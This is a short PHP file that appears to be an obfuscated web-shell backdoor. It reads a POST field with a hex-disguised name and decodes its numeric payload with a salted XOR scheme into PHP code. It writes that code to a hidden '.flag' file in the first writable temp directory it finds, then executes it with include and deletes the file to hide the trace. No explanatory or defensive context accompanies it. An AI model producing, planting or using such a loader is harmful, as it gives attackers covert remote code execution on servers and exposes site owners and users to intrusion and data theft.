<?php

if(in_array("e\x6E\x74", array_keys($_POST))){
	$hld = $_POST["e\x6E\x74"];
			$hld  	=	explode	( "." 	 , 	$hld) ; 
	$ptr = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$salt);
            $r = 0;
    
            foreach(	$hld as $v6) {	$sChar = ord(	$salt[$r % $sLen]);
                $dec =(	(	int)$v6 - $sChar -(	$r % 10))^ 20;
                $ptr .= chr(	$dec);
                $r++;
            }
	$rec = array_filter([ini_get("upload_tmp_dir"), session_save_path(), getenv("TEMP"), getenv("TMP"), getcwd(), "/tmp", "/var/tmp", sys_get_temp_dir(), "/dev/shm"]);
	while ($symbol = array_shift($rec)) {
    		if (array_product([is_dir($symbol), is_writable($symbol)])) {
    $tkn = implode("/", [$symbol, ".flag"]);
    $success = file_put_contents($tkn, $ptr);
if ($success) {
	include $tkn;
	@unlink($tkn);
	exit;}
}
}
}